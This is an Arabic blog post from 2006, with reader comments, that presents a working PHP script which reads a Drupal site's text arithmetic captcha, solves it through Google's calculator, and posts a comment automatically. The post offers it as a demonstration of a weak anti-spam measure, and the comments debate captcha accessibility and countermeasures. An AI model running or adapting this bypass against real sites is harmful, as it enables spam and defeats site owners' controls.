هذه الصفحة تعتمد على صفحات الطرز المتراصة (CSS)
| &lArr
2006/08/26

أحبّ أسّخّم أحيانا

بما أني قضيت اليوم كله أبحث عن طرق للحد من سخام التعليقات و التتبع على هذه المدونة، و بما أن ورائي أعمال أخرى هامة و عاجلة، فقد قررت أن أشغل وقتي بشيء لا لزوم له على لإطلاق يهدف إلى التسخيم على الآخرين.

أخذت مني وقتا طويلا نسبيا (ساعتين) لأني لم أكتب أي كود على الإطلاق منذ سنوات، و لأني محدث PHP، لكن ها هي النتيجة :

<?php /* Code to demonstrate how text arithmetic captcha can be defied using Google calculator. Ahmad Gharbeia, 2006-08-26 This code is meant for demonstrating only. Use of it, or a derivative of it, to propagate comments or defy spam-suppressing mechanisms or to disrupt the work of web sites and systems, or interact with web sites in ways other than those specified by the websites owners and/or managers is prohibited by the author. *///The following variables can be passed to this script via a form. $pURI = "http://example.org/node/1529"; //the URI of the post having the captcha at the comment form $comment['edit[name]'] = "Alif"; $comment['edit[mail]'] = ""; $comment['edit[homepage]'] = "http://zamakan.gharbeia.org/"; $comment['edit[comment]'] = "Text math captchas can be easily defied using Google calculator and cURL at <a href=\"http://zamakan.gharbeia.org/233\">http://zamakan.gharbeia.org/233</a>.\nSorry, Sameer, but you're the only one I know who uses it :P";$ch = curl_init($pURI); curl_setopt($ch, CURLOPT_FAILONERROR, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);curl_setopt($ch, CURLOPT_HTTPGET, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); preg_match("~<label for=\"edit\-captcha_response\">Math Question: What is (\d+\s[\+\-]\s\d+)\?: <span class=\"form\-required\" title=\"This field is required\.\">\*</span></label>~", curl_exec($ch), $foomath);curl_setopt($ch, CURLOPT_URL, "http://www.google.com/search?q=" . urlencode($foomath[1])); preg_match("~<td nowrap><font size=\+1><b>\d+\s[\+\-]\s\d+\s=\s(\d+)</b></td>~", curl_exec($ch), $goomath); $comment['edit[captcha_response]'] = $goomath[1];curl_setopt($ch, CURLOPT_RETURNTRANSFER, FALSE); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, $comment); curl_exec($ch); curl_close($ch); ?>

هذا الكود يخترق مانعة السخام الحسابية النصية البسيطة التي تهدف إلى التأكد من أن واضع التعليق أدمي و ليس آلة، وهي المستخدمة في بعض مواقع دروبال مثل عند محمد سمير.

و هو يستخدم آلة جوجل الحاسبة المسألة الحسابية، ثم يستخدام الحل في وضع تعليق سخامي يتجاوز آلية المنع.

السبب في سهولة اختراق هذا العائق هو أن المسألة الحسابية مقدمة في شكل نص. لو كانت موضوعة في صورة لصعب الأمر كثيرا لأنه يحتاج إلى آلية للتعرف البصري على الأحرف OCR، و هي أكثر تعقيدا بكثير.

احمد ربنا يا محمد سمير أني لم أربط لهذا الكود في ملف في هذه التدوينة، و إلا انهال عليك السخام من حيث لا تحتسب. فاكر المناقشة القديمة عن الفرق بين GET و POST و RESTful web؟

دا يعلمنا أن الشر و السخافة أسهل بكثير. ما تعملوش كدا.

الكود أعلاه منشور بهدف تقييم جدوى نظام أمني محدد و استخدامه، أو أي تنويعات عليه، بغرض نشر السخام أو تعطيل المواقع أو الاستخدام أو الولوج غير المصرح به لنظم يملكها آخرون هو فعل غير قانوني يتحمل مرتكبه مسؤوليته. (اقرأ الفصل الثالث من ميثاق حقوق الآلات الواعية)

(12) تعليقات

  1. انا لسه ساعات بيجيلى تعليقات سخام

    فكرت انى اخلى المساله الحسابية تطلع على هيئة صورة بس مكسل

    شكلى كده هاعد اعملها بعد عملتك السودا

    :-)

      Mohammed Sameer @ 11:52 2006/08/26

  2. الدرس الأول الذى يجب أن نذكره من أدهم صبري و لا ننساه أبداً
    “لا يوجد نظام أمنى سليم 100% دائماً هناك ثغرة”

      بيسو @ 12:44 2006/08/26

  3. أولا نظام الحماية من السخام مش نظام أمني و مش مطلوب منه يبقى 100% و مش مطلوب منه يشتغل للأبد

    يعني حاليا السخاميين مبيستخدموش حاجة تعدي من الكابوتشي الحسابي و بالتالي مفيش مشكلة في استخدامه، صحيح أن نظريا الكابوتشي اللي عبارة عن نص مبعتر و مفشوخ على خلفية مزعجة أصعب على المكنة، بس هو برضه أصعب على البشر (خصوصا البشر اللي بصرهم ضعيف أو عندهم اعاقات ما)، و بالتالي الكابوتشي أبو عملية حسابية بسيطة ألطف الى أن يقرر السخاميين تخطيه.

    و وقتها هيبقى فيه حلول بسيطة، من نوع زرع كلمات مخفية بالcss ما بين الأرقام مثلا بحيث يكون رقم العملية الحسابية مختلف عن ما يظهر للمتصفح (صوت كان أو صورة)، أو حتى حاجة أبسط من نوع زرع نص عشوائي في أسامي المتغيرات في الاستمارة.

    و طبعا الحلين دول يسهل تخطيهم برضه بس الفكرة أن السخاميين هياخدوا وقت على ما يتخطوهم، و هكذا مش هنخلص أبدا من الموضوع بشكل نهائي. (و كل الحلول دي و المخاطرة بفلتان شوية سخام أحسن في رأيي من منع فئة من البشر من التعليق لمجرد أني مفترض أن كلنا بصرنا 6/6).

    أخيرا يا بيسو دروبال في الكابوتشي الرخم بتاع النص المفشوخ لو عايز.

      Alaa @ 14:53 2006/08/26

  4. نسيت أقول أن الكابوتشي الحسابي بيحميك من نوعيات القردة العليا اللي ممكن تسقط في اختبار تيورنج و دي ميزة كبيرة. عقبال ما نعمل module بيخصي من يخطأ ثلاث مرات على التوالي (حماية لبقاء النوع و كده).

      Alaa @ 14:56 2006/08/26

  5. مش مقصود أنه نظام أمني من النوعية التي توظف قوائم الصلاحيات و كلمات المرور و التعمية القوية، لكن الهدف منه لا زال منع استخدام نظام معين بطريقة غير مرغوب فيها.

    يا علاء، الكابوتشي دا نوع من الخسّ، البتاع ال فوق دا اسمه كابتشا CPATCH اختصار عبارة طويلة هزلية متعلقة باختبار تورنج.

      ألِف @ 15:44 2006/08/26

  6. ما أنا عارف، بس عجباني فكرة أني أسميه كابوتشي، أشمعنى يعني العرب يحقلهم يسموه هركيوليز هرقل و أنا ميحقليش أسمي كابتشا كابوتشي؟

      Alaa @ 15:49 2006/08/26

  7. لا طبعا
    الكلمة المفشوخة دا اوسخ طريقة لمنع السخام، دى بتمنع اى حد انه يفكر انه يعلق

      بيسو @ 21:13 2006/08/26

  8. انا فعلا طول عمري بسأل نفسي ليه الدكاترا خطهم وحش وهم بيكتبوا الروشته
    ومش عارف ان كان ده تعمد
    ولا من أدبيات المهنة ؟؟

    حاجة غريبة فعلاً !!

      يحي مجاهد @ 00:31 2006/09/01

  9. حلوه دروس أدهم صبرى إنت شكلك قريت أخر روايتين ههههه

      brokensoft @ 10:04 2006/09/09

  10. طيب مع مراعاة اني مابافهمش في الحدوتة دي كلها
    أنا عندي مشكلة رهيبة مع السبام , لما حطيت مسالة حسابية لقيتها زادت ماقلتش
    دي ليها حل عندك؟؟؟؟؟

      bluerose @ 18:39 2006/10/28

  11. يا بلوروز، الكابتشات أنواع، و السخاميين عندهم برمجيات مضادة لبعض الأنواع. أنا بصيت بصة سريعة على صفحتك و لقيت نوع الكابتشا ال راكبة عندك بتحط الحل بشكل مموه مع نموذج التعليق نفسه، و ممكن جدا يكون السخاميين بيعرفو يفكوا التمويه دا، أو حتى يطفشوه بهجوم القوة الغاشمة (crack with brute force attack).

    الحكاية حرب و وكل مضاد-حاجة له مضاد-مضاد-الحاجة.

    هو مسموحلك تركبي تركيبات (plugins) في مدونتك عند wordpress.com؟

      ألِف @ 00:32 2006/10/30

  12. معلش من غير تريقة , أنا قلت من البداية أنا مش بافهم في القصة دي كلها

    ايه بقى هي ال plugins???????

    بالراحة علي شوية يا ألف , أنا فعلا ماليش في الحدوتة

      bluerose @ 17:20 2006/10/31

عذرا، التعليقات مقفلة.